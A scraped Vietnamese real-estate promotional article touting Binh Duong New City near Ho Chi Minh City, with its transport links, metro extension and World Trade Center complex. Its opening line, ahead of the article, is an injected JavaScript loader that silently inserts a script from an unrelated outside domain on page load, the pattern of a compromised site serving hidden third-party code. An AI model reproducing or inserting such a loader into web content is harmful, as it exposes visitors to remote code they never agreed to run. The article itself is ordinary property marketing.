;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dòng tiền đổ về vùng phụ cận TP.HCM, Thành phố mới Bình Dương ‘hốt bạc’

Dòng tiền đổ về vùng phụ cận TP.HCM, Thành phố mới Bình Dương ‘hốt bạc’

Show all

Dòng tiền đổ về vùng phụ cận TP.HCM, Thành phố mới Bình Dương ‘hốt bạc’

dong-tien-do-ve-thanh-pho-moi-binh-duong

Sở hữu nội lực quy hoạch và tiện ích hoàn thiện, cộng hưởng với tiềm năng to lớn của “thủ phủ công nghiệp” quốc gia, Thành phố mới Bình Dương là cái tên sáng giá trên thị trường bất động sản (BĐS) khu vực phụ cận TP. HCM.

Với diễn biến thị trường hiện tại, dòng tiền của các nhà đầu tư có xu hướng đổ về các khu vực phụ cận với mặt bằng giá dễ chịu; biên độ lợi nhuận tiềm năng hơn. Tiêu chí thuyết phục các nhà đầu tư không nằm ngoài tốc độ đô thị hóa; hoàn thiện hạ tầng của từng khu vực; cũng như tiềm năng tăng giá, cho thuê sinh lời tốt, pháp lý vững vàng.

Đặc biệt, theo nhiều chuyên gia, BĐS hưởng lợi thế của khu công nghiệp như Bình Dương được ưa chuộng hơn cả. Bởi ngoài mục đích đầu tư tích sản, khu vực này dễ dàng khai thác kinh doanh thương mại dịch vụ nhờ vào tốc độ gia tăng dân số cùng khả năng thu hút chuyên gia nước ngoài đến sinh sống và làm việc.

Tiềm năng to lớn từ “thủ phủ công nghiệp” quốc gia

Ở vị trí tâm điểm chiến lược của Bình Dương, Thành phố mới Bình Dương (TPM Bình Dương) đang nổi lên như một “thỏi nam châm” cỡ đại thu hút dòng tiền cực lớn đổ vào đầu tư BĐS do thừa hưởng lợi thế từ “thủ phủ công nghiệp” Việt Nam.

Lợi thế đầu tiên phải kể đến là hệ thống hạ tầng giao thông quy mô hiện đại, kết nối thẳng với TP.HCM và toàn bộ vùng kinh tế trọng điểm phía Nam.Vài năm gần đây, hàng loạt dự án giao thông trọng điểm đi qua Bình Dương đã liên tục được chấp thuận thông qua như nâng cấp và mở rộng Quốc lộ 13; đường cao tốc Hồ Chí Minh – Chơn Thành; đường Vành đai 3 và 4; kéo dài tuyến metro số 1 Bến Thành – Suối Tiên về TPM Bình Dương, v.v… Vừa qua, địa phương này còn tiếp cận được nguồn vốn vay ODA trị giá 543 tỉ yên để triển khai dự án đường sắt đô thị và cải thiện giao thông công cộng. Tất cả tạo “cú hích” cho TPM Bình Dương nâng cao vị thế và tiềm năng phát triển dài hạn.

dong-tien-do-ve-thanh-pho-moi-binh-duong

Nội lực từ quy hoạch bài bản và tiện ích tầm cỡ

TPM Bình Dương cơ bản đã hoàn thiện các hạng mục hạ tầng – tiện ích, mang dáng dấp của một đại đô thị đầy sức sống với những tòa nhà và các đại lộ rợp bóng cây xanh. Nơi đây đã và đang hình thành đầy đủ dịch vụ từ hành chính, giáo dục, y tế, văn hóa, thương mại cho đến vui chơi giải trí.

Nổi bật trong số này là Khu phức hợp Trung tâm thương mại Thế giới Thành phố mới Bình Dương với quy mô 400.000 m2 bao gồm: WTC Gateway, WTC Expo và WTC Tower. Là thành viên của Hiệp hội Trung tâm thương mại Thế giới WTA, nơi đây được quy hoạch để trở thành một điểm đến nổi bật, kết nối kinh tế và giao lưu văn hóa với 23 thị trường lớn trên toàn cầu.

Trong đó, WTC Gateway là công trình được trông đợi nhất bởi là nhà ga trung tâm kết nối Bình Dương với Thành phố Thủ Đức và tuyến metro Bến Thành – Suối Tiên, tọa lạc tại nút giao của nhiều đại lộ chính. Kề bên đó là tổ hợp văn phòng WTC Tower cũng sẽ sớm hoàn thiện, tạo nên hệ sinh thái tiện ích đủ đầy và diện mạo ấn tượng cho Bình Dương.

Với những lợi thế to lớn đó, thị trường Bình Dương nói chung và TPM Bình Dương hứa hẹn sẽ tạo nên một sự tăng trưởng bùng nổ về mọi mặt trong tương lai gần. Không chỉ với nhóm ngành kinh tế sản xuất, mà cả các ngành kinh tế dịch vụ cũng sẽ khởi sắc lên, bởi theo chân những doanh nghiệp sản xuất lớn, các công ty thương mại dịch vụ quốc tế cũng sẽ sớm đổ bộ vào.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Tin Nổi Bật
0888 69 7779